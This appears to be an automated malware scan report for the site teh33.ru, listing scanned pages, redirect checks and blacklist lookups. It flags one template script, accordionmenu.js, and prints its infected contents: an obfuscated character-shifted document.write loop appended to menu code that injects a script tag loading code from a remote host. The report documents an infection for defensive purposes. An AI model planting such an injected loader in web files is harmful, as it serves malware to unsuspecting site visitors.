Scanned pages/files
Request | Server response | Status |
http://www.teh33.ru/ | 200 OK Content-Length: 11926 Content-Type: text/html | clean |
http://www.teh33.ru/templates/yoo_streamline_j15/warp/libraries/jquery/jquery.js | 200 OK Content-Length: 91037 Content-Type: application/x-javascript | clean |
http://www.teh33.ru/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/x-javascript | clean |
http://www.teh33.ru/templates/yoo_streamline_j15/warp/js/warp.js | 200 OK Content-Length: 8857 Content-Type: application/x-javascript | clean |
http://www.teh33.ru/templates/yoo_streamline_j15/warp/js/accordionmenu.js | 200 OK Content-Length: 1723 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){var a=function(){};d.extend(a.prototype,{name:"accordionMenu",options:{mode:"default",display:null,collapseall:!1,toggler:"span.level1.parent",content:"ul.level2"},initialize:function(a,b){var b=d.extend({},this.options,b),c=a.find(b.toggler);c.each(function(h){var a=d(this),c=a.next(b.content).wrap("<div>").parent();c.data("height",c.height());a.hasClass("active")||h==b.display?c.show():c.hide().css("height",0);a.bind("click",function(){f(h)})});var f=function(a){var a=d(c.ge <!-- js-tools --> w=0;while(w<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00juifmq/{q/vb0xq.dpoufou0qmvhjot0ubcmfqsftt0tubu/qiq#?=0tdsjqu?'.charCodeAt(w++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.teh33.ru/templates/yoo_streamline_j15/warp/js/dropdownmenu.js | 200 OK Content-Length: 5394 Content-Type: application/x-javascript | clean |
http://www.teh33.ru/templates/yoo_streamline_j15/js/template.js | 200 OK Content-Length: 4837 Content-Type: application/x-javascript | clean |
http://www.teh33.ru/templates/yoo_streamline_j15/warp/js/search.js | 200 OK Content-Length: 4080 Content-Type: application/x-javascript | clean |
http://www.teh33.ru/component/content/section/2.html | 200 OK Content-Length: 7494 Content-Type: text/html | clean |
http://www.teh33.ru/component/content/category/4-stroitelnoe-i-skladskoe-oborudovanie.html | 200 OK Content-Length: 9858 Content-Type: text/html | clean |
http://www.teh33.ru/component/content/article/4-stroitelnoe-i-skladskoe-oborudovanie/15-kran-konsolnyj.html | 200 OK Content-Length: 14488 Content-Type: text/html | clean |
http://www.teh33.ru/component/content/article/4-stroitelnoe-i-skladskoe-oborudovanie/ | 200 OK Content-Length: 18640 Content-Type: text/html | clean |
http://www.teh33.ru/proizvodstvo-suharej.html | 200 OK Content-Length: 24856 Content-Type: text/html | clean |
http://www.teh33.ru/proizvodstvo-suharej/3-kontrol-kachestva-gotovoj-produkczii.html | 200 OK Content-Length: 17524 Content-Type: text/html | clean |
http://www.teh33.ru/proizvodstvo-suharej/ | 200 OK Content-Length: 24836 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: teh33.ru
Result:
GET / HTTP/1.1
Host: teh33.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: teh33.ru
Referer: http://www.google.com/search?q=teh33.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: teh33.ru
Referer: http://www.google.com/search?q=teh33.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=teh33.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://teh33.ru/
Result: teh33.ru is not infected or malware details are not published yet.
Result: teh33.ru is not infected or malware details are not published yet.